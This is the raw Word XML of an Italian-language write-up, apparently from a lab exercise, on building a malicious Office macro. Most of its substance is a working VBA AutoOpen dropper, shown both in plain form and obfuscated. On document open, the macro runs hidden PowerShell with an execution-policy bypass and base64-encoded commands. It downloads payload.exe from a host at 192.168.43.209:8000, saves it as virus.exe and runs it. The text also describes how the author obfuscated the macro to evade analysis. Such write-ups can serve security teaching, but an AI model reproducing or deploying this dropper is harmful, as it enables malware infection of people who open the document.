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87493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87493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5C9AB962" w:rsidR="003D71C6" w:rsidRPr="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="00387493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D71C6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>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214A3C87" w14:textId="294E138B" w:rsidR="003104B9" w:rsidRP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7DA8DF82" w14:textId="616CDD2F" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t xml:space="preserve"> "(New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003104B9">
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003104B9">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003104B9">
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003104B9">
        <w:t>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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B046EC">
        <w:t>percorso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>dove</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B046EC">
        <w:t>voglio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B046EC">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B046EC">
        <w:t>salvare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B046EC">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t xml:space="preserve">virus.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>" &amp; "')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A99D" w14:textId="0908738D" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>comandoDaEseguire2=</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t xml:space="preserve"> " &amp; '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>percorso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>dove</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>è\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>salvato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>virus.exe'"</w:t>
      </w:r>
    </w:p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scarica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7CCCD5DD" w14:textId="536A41F0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esegui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40197322" w14:textId="315A4315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6CFABFC0" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="003104B9">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">er la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codifica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in VB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dificano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stringh</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> date in input, in un contest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>real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sarebbero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> state date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come input del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodificatore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di VBA, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tuttavia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per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del file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malevolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mostrarne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>funzionamento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.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aggi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029751B" w14:textId="6FCDD971" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inizializza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comandi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CA9E15E" w14:textId="0DEAE9F9" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>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59F5049C" w14:textId="1DD02D24" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>De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1597405E" w14:textId="216136C7" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">4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ecodificati</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>codifica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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base 64 e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>restituisce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> la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ta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Imposta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il testo del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>nodo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> con il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>comando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>codificare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B6F8D17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objNode.dataType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>bin.base</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DCB4F" w14:textId="409A1ECC" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objNode.nodeTypedValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>stringaABinario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>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Restituisci</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>risultato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ell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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257805B5" w14:textId="50481B66" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objNode.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>l'oggetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC4783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r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Converte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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>dati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binari</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Default="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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47D7FE8B" w14:textId="1E0DDA00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  <w:r w:rsidR="00B40B24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NON OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF322E" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00B40B24" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00B40B24">
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40B24">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172510A4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dificato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC15DC" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    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7157DF0F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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53152667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5679B859" w14:textId="0E94B5CD" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>crist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>\Downloads\virus.exe'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A22013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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>codificato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B54866" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    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9A7668B" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615B524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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>decodifico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> due </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>comandi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> da base64 a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>normali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49D30D54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mandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">comandoBase64, "BASE64_ENCODED_COMMAND", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>codificato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360105D1" w14:textId="4A8FD845" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048E77C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65DE3DD0" w14:textId="34A41DB0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19F651D8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19AE99EC" w14:textId="77777777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A53AD07" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    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Pr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03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lastRenderedPageBreak/>
        <w:t>CODICE MACRO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C347974" w14:textId="359DCCA0" w:rsidR="00D5452C" w:rsidRDefault="00D5452C" w:rsidP="00B355D4">
      <w:r w:rsidRPr="00D5452C">
        <w:t xml:space="preserve">Nel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5452C">
        <w:t>codice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5452C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5452C">
        <w:t>offuscato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solo i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(AutoOpen) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodificatore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in base64, in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>questo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modo ho </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>potuto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responsabi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dif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ringhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.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ho </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> VBA Obfuscator</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> e ho </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>diviso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>comandi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> in due </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>stringhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve">, per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>aumentare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>confusione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18280E65" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCE56C" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim v38d2edd4076bb66acc2ee1b42bdb2336 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA4AEF" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim vr4573k99768ffgruighfjkgbgvghjjhg As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D97F7A" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim ca9d601c97cef483411de079bb9a3419b As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC3E32" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim jytfk6877hnhhjj89ong6rbgfghj66879 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAB398" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim m758f0834b3c6499700addb9b25f64906 As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8A73C" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">Set m758f0834b3c6499700addb9b25f64906 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VBA.CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A347A8C" w14:textId="70E66FF0" w:rsidR="00A536A2" w:rsidRDefault="00387493" w:rsidP="00A536A2">
      <w:r w:rsidRPr="00387493">
        <w:t xml:space="preserve">jytfk6877hnhhjj89ong6rbgfghj66879 </w:t>
      </w:r>
      <w:r w:rsidR="00A536A2">
        <w:t>= "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> Bypass -Command "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E06DB" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336 = "IEX([</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69C9AA" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">vr4573k99768ffgruighfjkgbgvghjjhg = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xjcmlzdFxEb3dubG9hZHNcdmlydXMuZXhlJyk=")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A4AE2" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">ca9d601c97cef483411de079bb9a3419b = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "ICYgJ0M6XFVzZXJzXGNyaXN0XERvd25sb2Fkc1x2aXJ1cy5leGUn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7AEEC" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E6017" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B09095B" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Set m758f0834b3c6499700addb9b25f64906 = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D677C39" w14:textId="14B8A7FA" w:rsidR="00B355D4" w:rsidRPr="00B046EC" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p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260A00C5" w:rsidR="00B355D4" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B355D4">
        <w:t>L’attaccante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B355D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la </w:t>
